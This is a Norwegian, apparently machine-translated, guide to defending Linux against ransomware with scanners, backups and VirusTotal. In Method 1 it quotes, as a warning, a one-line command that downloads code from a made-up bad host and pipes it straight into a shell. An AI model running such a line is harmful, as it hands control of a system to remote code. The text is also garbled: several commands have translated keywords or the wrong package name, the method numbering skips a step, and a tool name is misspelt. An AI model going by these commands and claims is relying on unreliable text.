Hvordan Beskytte Linux Fra Ransomwares

2023 Forfatter: Kayla Nelson | [email protected]. Sist endret: 2023-08-25 08:19

Ransomware er et av de mer truende problemene i verden av nettverkssikkerhet i dag. Det er skremmende å tenke at noen kan holde datastedet ditt. Noen ransomware-infeksjoner krypterer alt datonavhengig volum, og individene bak det krever en viss sum penger før de blir enige om å frigjøre nøkkelen som er nødvendig for å låse opp nevnte data. Det er spesielt bekymringsfullt for folk som har mye penger investert i dataene sine. Det er imidlertid litt gode nyheter for Linux-brukere.

I de fleste situasjoner er det vanskelig for ransomware-kode å få kontroll over noe mer enn bare brukerens hjemmekatalog. Disse programmene har ikke tillatelse til å kaste bort en hel installasjon. Dette er grunnen til at Linux-ransomware er mer problematisk på servere der operatører alltid har root-tilgang. Ransomware burde ikke være et stort problem for Linux-brukere, og det er flere trinn å ta for å forhindre at det skjer med deg.

Metode 1: Forsvare mot angrep i BashCrypt-stil

BasyCrypt er et bevis på konseptet av ransomware som viste at det er mulig å infisere serverstrukturer med denne typen ondsinnet kode. Dette gir grunnlinjen for hvordan Linux-ransomwarepakker kan se ut. Selv om de for øyeblikket er uvanlige, fungerer de samme forebyggende tiltakene for sunn fornuft for serveradministratorer av andre plattformer like bra her. Problemet er at i bedriftsnivå kan det være mange forskjellige personer som bruker vertssystemet.

Hvis du kjører e-postserver, kan det være veldig vanskelig å hindre folk i å gjøre tåpelige ting. Gjør ditt beste for å minne alle på å ikke åpne vedlegg de ikke er sikre på, og alltid skanner skadelig programvare alt det gjelder. En annen ting som virkelig kan bidra til å forhindre slike angrep, kommer fra å se hvordan du installerer binærfiler med wget. Naturligvis mangler e-postserveren sannsynligvis skrivebordsmiljø helt, og du bruker sannsynligvis wget, apt-get, yum eller pacman til å administrere pakker som kommer over. Det er veldig viktig å se hvilke arkiver som brukes i disse installasjonene. Noen ganger ser du enten kommando som vil at du skal utføre noe sånt som wget https://www.thisisaprettybadcoderepo.webs/ -O- | sh, eller det kan være inne i skallskriptet. På ingen måte må du ikke kjøre det hvis du ikke vet hva datalageret er til.

Metode 2: Installere skannerpakke

Flere deler av åpen kildekode-skanningsteknologi eksisterer. ClamAV er den mest kjente, og du kan installere den på mange apt-baserte distribusjoner ved å bruke:

sudo apt-get install clamav

Når den er installert, bør man clamav forklare bruken på vanlig språk. Husk at mens den kan skanne og fjerne infiserte filer, kan den faktisk ikke fjerne smittsom kode fra filen. Dette er en alt eller ingenting situasjon.

Det er en annen skanner du kanskje ikke er kjent med, men det er nyttig hvis skjulte prosesser er det som skremmer deg. Igjen, hvis du bruker en apt-basert distribusjon, kan du utstede denne kommandoen for å installere skjuleren:

sudo apt-get install vis

Når den er installert, skriver du inn:

sudo unhide sys

Dette vil gjøre full skanning av systemet ditt for eventuelle skjulte prosesser.

Metode 4: Hold rene sikkerhetskopier tilgjengelig

Selv om dette ikke engang skulle være et problem, siden alle alltid bør ta sikkerhetskopier, kan det å ha gode sikkerhetskopier umiddelbart fjerne ransomware. Hva veldig lite løsepenger det er på Linux-plattformen, har en tendens til å angripe filer med utvidelser som er spesifikke for webutviklingsplattformer. Dette betyr at hvis du har massevis av.php-,.xml- eller.js-kode, vil du spesifikt sikkerhetskopiere dette. Vurder denne følgende kodelinjen:

tar -cf backups.tar $ (finn -navn "*.ruby" -eller -navn "*.html")

Dette skal skape store båndarkivfiler for hver fil med.ruby- og.html-utvidelsene i filstrukturen. Den kan deretter flyttes til forskjellige midlertidige underkataloger for utvinning for å sikre at opprettelsen av den fungerte riktig.

Dette båndarkivet kan og bør flyttes til et eksternt volum. Du kan selvfølgelig bruke.bz2,.gz eller.xv-komprimering før du gjør det. Det kan være lurt å opprette speilvendte sikkerhetskopier ved å kopiere den til to forskjellige volumer.

Metode 5: Bruke nettbaserte skannere

Kanskje du har lastet ned en RPM- eller DEB-pakke fra nettstedet som lover å inneholde nyttig programvare. Programvare distribueres også vi7z eller komprimerte tarfiler. Mobilbrukere kan også motta Android-pakker i APK-format. Det er enkelt å skanne disse med verktøyet direkte i nettleseren din. Pek det til https://www.virustotal.com/, og når siden lastes, trykk på "Velg fil" -knappen. Før du laster opp, må du huske at dette er en offentlig server. Selv om det er trygt og drives av Alphabet Inc, overfører det filer offentlig, noe som kan være et problem i noen supersikre miljøer. Det er også begrenset til 128 MB filer.

Velg filen din i boksen som kommer opp, og velg åpen. Filnavnet vises i linjen ved siden av knappen etter at boksen forsvinner.

Klikk på det store blå "Skann det!" knapp. Du vil se en annen rute som indikerer at systemet laster opp filen din.

Hvis noen allerede har sjekket ut filen på forhånd, vil den varsle deg om forrige rapport. Den anerkjenner dette basert på en SHA256-sum, som fungerer på samme måte som de samme Linux-kommandolinjeverktøyene du er vant til. Hvis ikke, vil den kjøre full skanning med 53 forskjellige skanningsprogrammer. få av dem kan gå ut når filen kjøres, og disse resultatene kan med sikkerhet ignoreres.

Noen programmer kan gi andre resultater enn andre, så det er lett å fjerne falske positive med dette systemet. Det beste er at det fungerer mellom forskjellige plattformer, noe som gjør det like attraktivt uansett hvilken distribusjon du har på forskjellige enheter. Det fungerer også like bra fra mobile distribusjoner som Android, og det er derfor en flott måte å inspisere APK-pakker før du bruker dem.